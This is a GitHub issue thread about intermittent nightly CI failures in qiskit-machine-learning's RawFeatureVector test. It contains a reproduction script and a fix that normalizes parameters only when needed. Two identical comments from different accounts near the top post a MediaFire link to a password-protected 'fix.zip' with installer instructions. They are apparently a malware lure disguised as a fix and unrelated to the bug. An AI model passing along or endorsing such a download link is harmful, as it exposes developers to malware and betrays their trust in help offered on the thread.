### ISSUE TITLE
Nightly CI seems to have been failing for a while in random jobs

### ISSUE THREAD

**Issue by woodsp-ibm** [qiskit-community/qiskit-machine-learning#829]
Nightly CI seems to be failing where random jobs show the error below. From what I can see the first occurred on 16th Aug which would be following the release of Qiskit 1.2.0 the day before.
```
      File "D:\a\qiskit-machine-learning\qiskit-machine-learning\test\circuit\library\test_raw_feature_vector.py", line 63, in test_fully_bound
    self.assertEqual(bound.decompose(), ref)

      File "c:\hostedtoolcache\windows\python\3.8.10\x64\lib\unittest\case.py", line 912, in assertEqual
    assertion_func(first, second, msg=msg)

      File "c:\hostedtoolcache\windows\python\3.8.10\x64\lib\unittest\case.py", line 905, in _baseAssertEqual
    raise self.failureException(msg)

    AssertionError: <qiskit.circuit.quantumcircuit.QuantumCircuit object at 0x0000029754FC25E0> != <qiskit.circuit.quantumcircuit.QuantumCircuit object at 0x000002975636DBE0>
```
1.2.0 came with changes to have more logic in Rust for performance e.g. circuit data and there were changes to Initialize and StateVector as well which I think Raw Feature ends up using. But the failure seems random as in it passes in most jobs.

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by edoaltamura** [comment]
I've been noticing this for a while closer to the 1.2 release. Has this happened in other community repos too? I couldn't find this issue documented and reproduced in isolation in the main Qiskit - do you think it's worth looking into?

**Comment by woodsp-ibm** [comment]
It is probably worth running the test case locally in a loop to see if the failure occurs and what happens in the case the comparison fails. I see the test is using randomly generated params so maybe it depends on the value that it creates.

**Comment by woodsp-ibm** [comment]
The following reproduces the failure. The test is parameterizing the RawFeatureVector and an equivalently constructed circuit that should represent it with a random set of parameters and checking they are equal. It seems that some parameter values it fails - though if I print the circuits they seem to be the same - at least at the level of precision the values are printed but maybe there is some small difference sometimes that causes the failure. This code, based on what is in the test case, reproduces the failure. Note here I have fixed the random seed so it fails the first time through the loop (I found that by seeding with _i_ the loop count - having tried several I randomly picked where it did not fail). If you comment out the line seeding numpy then it may go through the loop a few times before it fails. I limited the amount of total tries so it would not go indefinitely but the most I saw in the few tries I did was a count in the 30's before it failed.

```
import numpy as np
import qiskit
from qiskit.circuit import QuantumCircuit
from qiskit_machine_learning.circuit.library import RawFeatureVector

failed = False
i = 0
while True:
    i += 1
    circuit = RawFeatureVector(8)

    np.random.seed(seed=8)  # Causes a failure first time, comment out for more random fails
    params = np.random.random(8) + 1j * np.random.random(8)
    params /= np.linalg.norm(params)
    bound = circuit.assign_parameters(params)

    ref = QuantumCircuit(3)
    ref.initialize(params, ref.qubits)

    tst = bound.decompose()

    if tst != ref or i > 100:
        failed = (tst != ref)
        break

print(f"{'Failed' if failed else 'Passed'} tries {i}")
print(tst)
print(ref)
```

**Comment by Cryoris** [comment]
That seems to be a fluke in the parameter renormalization in the `RawFeatureVector`. I assume due to round-off errors, renormalizing the parameters slightly changes them and then leads to slightly different circuits, e.g. in the snippet you provided @woodsp-ibm, one of the `Rz` gates differs by a factor of 2pi. 

The `Statevectors` of the circuits still compare to equal (as they should, the parameters differ only by roundoff errors) so I'm not 100% sure this is truly an error, since we do use slightly different workflows to obtain the circuit. That being said, we could fix it by only renormalizing the input parameters if they are not normalized, i.e. something like
```python
# in ParameterizedInitialize._define

norm = np.linalg.norm(cleaned_params)
normalized = cleaned_params if np.isclose(norm, 1) else cleaned_params / norm
``` 
I checked and that resolves the problem locally.

**Comment by woodsp-ibm** [comment]
@Cryoris Many thanks for looking at this and the change. It works great!
